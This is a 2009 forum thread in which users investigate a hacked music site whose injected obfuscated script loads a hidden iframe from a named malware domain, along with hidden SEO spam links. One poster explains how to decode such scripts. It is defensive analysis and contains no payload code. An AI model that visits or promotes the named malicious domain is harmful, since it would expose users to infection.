Bad stuff on a site

[jcarter]

I remember reading about this here recently, here is more, 2 screenshots,
Jane

[Paddy]

Jane, I didn't get that warning when I went there just now in Safari. However, in FF, I did get the attack site warning. What is the IP number associated with the site? It should be on the malware warning at the bottom - but you've covered it with the attack site warning I think. Since I'm not getting the malware warning, I can't see it.

When I click on the link to the Google diagnostics in the attack site warning I get this:

QUOTE

What happened when Google visited sites hosted on this network?

    Of the 15276 site(s) we tested on this network over the past 90 days, 2065 site(s), including, for example, couponsdeal.com/, tjw-uk.com/, worldofmen.org/, served content that resulted in malicious software being downloaded and installed without user consent.

    The last time Google tested a site on this network was on 2009-02-04, and the last time suspicious content was found was on 2009-02-04.

Has this network hosted sites acting as intermediaries for further malware distribution?

    Over the past 90 days, we found 46 site(s) on this network, including, for example, free-social-tools.com/, sudokus2go.com/, woodyspornnetwork.com/, that appeared to function as intermediaries for the infection of 140 other site(s) including, for example, hausverwaltersuche.de/, caw2.com/, downloadyoutubevids.com/.

Has this network hosted sites that have distributed malware?

    Yes, this network has hosted sites that have distributed malicious software in the past 90 days. We found 127 site(s), including, for example, xdxbx.com/, worldvedro.com/, free-social-tools.com/, that infected 1666 other site(s), including, for example, bedoon.net/, almosafr.com/, samaq8.com/.

Next steps:

    * Return to the previous page.

Updated 4 hours ago

The service provider, servage.net in Germany, appears to be having some ongoing issues - apparently not solved as this site claims:

http://allensmithnet.vox.com/library/post/...ensmithnet.html

[jcarter]

Its 77.232.68.144

[Paddy]

Furthermore, the issues have been going on for a long time:

http://www.webhostingtalk.com/showthread.p...8462&page=4
http://www.befuddled.me.uk/2008/11/site-hacked-daily/

Wonder if they're on any lists of bad hosts that Tacit may have?

From the IP number, which belongs to Servage, I'd say the sites themselves have the malware. In Chris' case, only a redirect TO the malware-hosting site was injected into the HTML.

Servage.net is obviously a host to avoid!

[jcarter]

I have added in FF the ability to see the IP number on the bottom right of the status bar on any page I go to,
but interestingly, mine is password protected, here is the message when I type my IP # in, or the other site of mine just comes up blank.

[tacit]

Just took a look at the site.

If you visit hammersound.net (on a Mac, you can't be infected by it), and then do a View Source in your browser, the very first thing you'll see is a JavaScript. This JavaScript has been written in a confusing manner to make it as hard as possible to read, but it loads an invisible frame from http://7speed.info; that invisible frame attempts to download a virus on vulnerable Windows computers.

7speed.info is hosted in Russia (of course); hammersound.net is hosted on Servage (www.servage.net). Hammersound has been infected in the past as well; it's an extremely poorly secured site.

I've fired off an email to Servage; let's see if they do anything about cleaning up their network.

[jcarter]

Hi Tacit,
Thank you for explaining it. I went to hammersound to see some Garage Band music.
Its fun for me to learn about this stuff.
Jane

[Paddy]

Tacit, is it the script at the top of the page or the one at the bottom (and how did you dig that bit of info out...I looked at it and couldn't make head or tail of it)

Also - there are a bunch of invisible links on that page - mostly to porn sites, so my guess is those were dumped in there by the hacker too. I had to wonder what was the point of having invisible links - until I read a bit more about this issue. (see below) The javascript is what makes them invisible, since it has "display = none" in there, and they're not popups. Google takes a very dim view of invisible links; generally one's page rank will drop badly if you have them, so it's not just the virus problem isn't the only hack going on here.

You can see at least some of the links (though not all the porn ones, which must be more recent than Google's cache) if you check the page here:

http://www.seoidiot.co.uk/cachechecker/

Something to do with this, probably:

http://www.lifehacker.com.au/tips/2008/06/...te_hackers.html

http://blogs.computerworld.com/bad_combo_h...with_seo_skills

http://www.deepjiveinterests.com/2008/04/0...f-blogs-hacked/

The nasty thing is that without the virus in there as well, the problems on that site could very well have gone undetected for ages if the page is not updated. I think I'll email the site owner. I'm assuming he doesn't have a clue about this.

[jcarter]

Egads!  What did I find when just surfing for Garage Band songs.
This is scary. The site owner must be terribly upset, what should someone do in a situation like this, switch to a small web host?
And blogs, how to keep them from this.

Can you put this stuff in to keep search engines and bad stuff away?
<meta name="robots" content="noindex,nofollow,noarchive">
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Cache-Control" content="no-cache, must-revalidate">
I would not want my lessons nor my family picture sites to ever be picked up by a search engine.
Nor compromised by something like this horrid stuff.
Yes, sort of glad I found this, its an interesting topic to say the least.
Glad there are warnings not to click upon a site which has been hacked.
Jane

A question, what the heck does the criminal gain by doing such a thing?

[Paddy]

QUOTE

A question, what the heck does the criminal gain by doing such a thing?

In this case, money. (See some of the links I listed - they more or less explain things.) The virus probably does something like allow your computer to be taken over remotely by the hackers to send out masses of spam; some of which of course does stuff like drive people to fake PayPal or bank sites.

As for keeping search engines off your site, you should also create a robots.txt file. Instructions here:

http://www.e-myth.com/cs/user/print/post/w...-block-the-bots (and look at the NYT example he links to - you could copy it and just add all the major search engines)

[krissel]

Interesting article about web registrars who are vulnerable to spammers and not doing much to avoid it.

http://tech.yahoo.com/news/pcworld/2009020...snamedandshamed

http://www.knujon.com/registrars/


They want you to send them your spam. There's an AppleScript down the page for Mac users.

http://www.knujon.com/sendusspam.html

[Xairbusdriver]

I'm not sure I want any contact with a company on that top/worst-ten list. Why should I send them anything that has my address on it? Or even bother to delete that bit and send the rest hoping that they don't try to get it another way? I'm just not trained to 'associate' with dangerous animals...

[tacit]

QUOTE(Paddy @ Feb 6 2009, 12:25 AM) <{POST_SNAPBACK}>

Tacit, is it the script at the top of the page or the one at the bottom (and how did you dig that bit of info out...I looked at it and couldn't make head or tail of it)

The one at the top.

The script is written in a highly obfuscated way, but it's easy to decode if you know a little bit about how JavaScript works.

These obfuscated scripts work by taking an encoded string, decoding it, and then putting it into the Web page by using a document.write command or an eval command. You can sort them out by saving the HTML to disk, opening them in a text editor, and looking for anything that says document.write or eval. You change the document.write or eval command to alert (the command to pop up abox), then open the HTML ile in your browser. A window will pop up containing the decoded JavaScript.

In this case, the decoded JavaScript opens an invisible iFrame from http://7speed.info, a site hosted in Russia. The invisible frame contains instructions to trick Internet Explorer into downloading a virus.

QUOTE(Paddy @ Feb 6 2009, 12:25 AM) <{POST_SNAPBACK}>

Also - there are a bunch of invisible links on that page - mostly to porn sites, so my guess is those were dumped in there by the hacker too. I had to wonder what was the point of having invisible links - until I read a bit more about this issue. (see below) The javascript is what makes them invisible, since it has "display = none" in there, and they're not popups. Google takes a very dim view of invisible links; generally one's page rank will drop badly if you have them, so it's not just the virus problem isn't the only hack going on here.

Yes. Technically, the "display = none" isn't JavaScript, it's CSS.

All kinds of sites use this CSS. For example, if you go to a Web site that causes a picture to appear in the middle of the screen when you click a link (iWeb can do this), the picture is actually always there. It's loaded when the page loads but it is set to display = none. When you click a button or a link the display = none is changed and bink! There it is, like magic.

The purpose of putting the hidden porn links in there is money. Google's page rank works by the number of people who link *to you*. The more other web sites that link to you, the higher your page appears in the searches. So hackers make their own pages appear higher in Google's searches by hacking other people's sites and then placing links on the hacked sites to their own sites.

QUOTE(Paddy @ Feb 6 2009, 12:25 AM) <{POST_SNAPBACK}>

The nasty thing is that without the virus in there as well, the problems on that site could very well have gone undetected for ages if the page is not updated. I think I'll email the site owner. I'm assuming he doesn't have a clue about this.

That would probably be a good idea, but I think the site owner may be MIA.